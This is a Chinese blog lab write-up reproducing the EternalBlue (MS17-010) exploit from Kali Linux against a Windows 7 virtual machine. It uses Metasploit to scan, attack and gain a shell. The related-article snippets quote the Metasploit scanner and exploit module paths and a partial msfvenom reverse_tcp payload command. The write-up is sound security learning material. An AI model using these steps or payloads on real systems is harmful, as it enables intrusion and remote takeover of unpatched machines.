kali linux 之复现永恒之蓝(ms17-010)漏洞

最新推荐文章于 2024-06-02 16:50:45 发布
最新推荐文章于 2024-06-02 16:50:45 发布
阅读量5k 收藏 34
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42298807/article/details/99660912
版权

一、实验目的
通过永恒之蓝漏洞获取Windows系统的权限
二、实验环境
WMware 虚拟机
Windows 7 64 位 (IP:192.168.148.139)
kali linux (192.168.148.128)
三、实验步骤
1、扫描网络中的主机
扫描192.168.148.0网段中存活主机的操作系统类型
在这里插入图片描述
发现可以攻击的主机192.168.148.139

在这里插入图片描述
2、扫描漏洞
开启metasploit
在这里插入图片描述

在这里插入图片描述
搜索ms17-010相关的模块
在这里插入图片描述利用该模块扫描目标主机是否有可以利用的漏洞
在这里插入图片描述
设置目标IP
在这里插入图片描述
开始扫描
在这里插入图片描述
发现可以利用的漏洞,永恒之蓝漏洞(445端口)。
开始攻击
在这里插入图片描述
设置被攻击主机与攻击主机IP
在这里插入图片描述
开始攻击
在这里插入图片描述

成功拿下windows7的shell
在这里插入图片描述
四、测试
1、在Kali Linux 下找到whoami.exe程序
在这里插入图片描述
将其复制到Windows7的/windows/system32路径下,在Kali拿下的shell中执行whoami 命令,就会出现windows7的用户名。

linanna81
关注
  • 5
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
kali linux 运行exe,简单的kali linux控制win7系统
weixin_42129970的博客
04-30 4961
本帖最后由 青衫覆雪 于 2019-10-23 08:36 编辑一、准备工作:1、安装kali linux2、从win7上拷贝一个可执行的.exe文件至kali linux(文中使用的是windows自带的calc.exe文件)二、开始在kali linux上创建.exe文件命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8...
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1766
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
m0_67427205的博客
12-23 907
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
永恒之蓝 (EternalBlue) 漏洞利用原理详解
最新发布
volta_xu的博客
06-02 919
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
kali永恒之蓝
qq_52820087的博客
10-25 7521
kali永恒之蓝攻击写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤五、种植后门 写在前面   这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,纯属兴趣爱好,本人非网络安全专业。写这个呢是为了记录一下去年我第一次在虚拟机上成功实现了永恒之蓝攻击,同时给一个”小朋友“做参考。目前,永恒之蓝漏洞已经销声匿迹了,所以大可不必担心。 一、永恒之蓝是何方神圣?   永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 766
任务环境说明:服务器场景:Server1。
kali Linux——永恒之蓝复刻
sparkleqs的博客
05-16 1984
Metasploit Framework 是一个功能强大的开源安全漏洞检测工具,用于编写、测试和使用 exploit 代码,广泛应用于渗透测试、shellcode 编写和漏洞研究。该框架主要采用面向对象的 Ruby 编程语言编写,并包含由 C 语言、汇编语言和 Python 编写的可选组件。最初的 Metasploit 是用 Perl 编写的,但在后来的版本中改为使用 Ruby 编写。
Kali Linux渗透测试—提权(一)——本地提权
weixin_45116657的博客
08-18 1940
本地提权: 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离。针对不同的应用——对应不同的账户——不同的账户在对应不同的权限; 本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单而言,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限,权限控制是WINDOWS、Linux等系统安全的基石,也是一切安全软件的基...
小白日记20:kali渗透测试之后渗透测试阶段(一)--上传工具
ZiXuanFY的博客
09-22 4767
后渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1、上传各种工具 2、提权:为了全面控制目标系统 3、擦除攻击痕迹:防止管理员通过日志溯源追踪,发现攻击源头【除了系统日记,应用程序也会有自己的日志信息】 ##删除系统日记和应用程序日记 例如:SLmail中 4、安装后门程序
kali工具包之nmap学习指南
12-23
用于学习使用nmap,扫描网上电脑开放的网络连接端。确定计算机运行那个操作系统,网络管理员必学软件之一,用于评估网络系统安全。
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
07-27
NSA_ms17010漏洞扫描(自检,请勿应用在非法途径上)
Kali Linux渗透基础知识整理(二)漏洞扫描
weixin_34054931的博客
07-31 943
Kali Linux渗透基础知识整理系列文章回顾 漏洞扫描 网络流量 Nmap Hping3 Nessus whatweb DirBuster joomscan WPScan 网络流量 网络流量就是网络上传输的数据量。 TCP协议 TCP是因特网中的传输层协议,使用三次握手协议建立连接。当主动方发出SYN连接请求后,等待对方回答SYN+ACK ,并最终对对...
永恒之蓝MS17010漏洞kali使用MSF进行漏洞复现
weixin_42540999的博客
08-19 8839
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序 今天就来利用KALI进行漏洞复现 实验准备: 1.win7靶机(未打补丁):192.168.1.141 2.kali攻击机:192
Kali Linux渗透测试进阶提升及其实战教程
11-07
一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要      本课程主要分享Kali Linux渗透测试进阶实战技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
使用Kali复现永恒之蓝漏洞ms17-010
m0_67463450的博客
01-15 971
永恒之蓝漏洞ms17-010)的简单复现
Kali Linux下利用永恒之蓝漏洞发起攻击获取Shell
热门推荐
时光途径
06-06 1万+
Material:        Computer         VMware 12        Kali Linux.ISO        InternetFirst:    Open Your Computer and VMware:Second Open Your SSH Connection Tools, Eg Securt CRT,Putty.......Input Msfconso...
kali linux学习(永恒之蓝
qq_43727668的博客
06-05 6500
写在之前 永恒之蓝是2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 准备工作 pc:windows7(未安装补丁)和kali linux 寻找目标靶机 ifconig#查看本机
kali复现ms17-010
09-26
ms17-010是指一个漏洞编号为MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148的漏洞。要在kali复现ms17-010,可以使用kali中的Metasploit框架来进行操作。首先,你需要使用ms17-010的辅助模块进行扫描,可以使用命令"use auxiliary/scanner/smb/smb_ms17_010"。然后,使用ms17-010的攻击模块来执行攻击,可以使用命令"use exploit/windows/smb/ms17_010_eternalblue"。通过执行这些命令,你将能够复现ms17-010漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值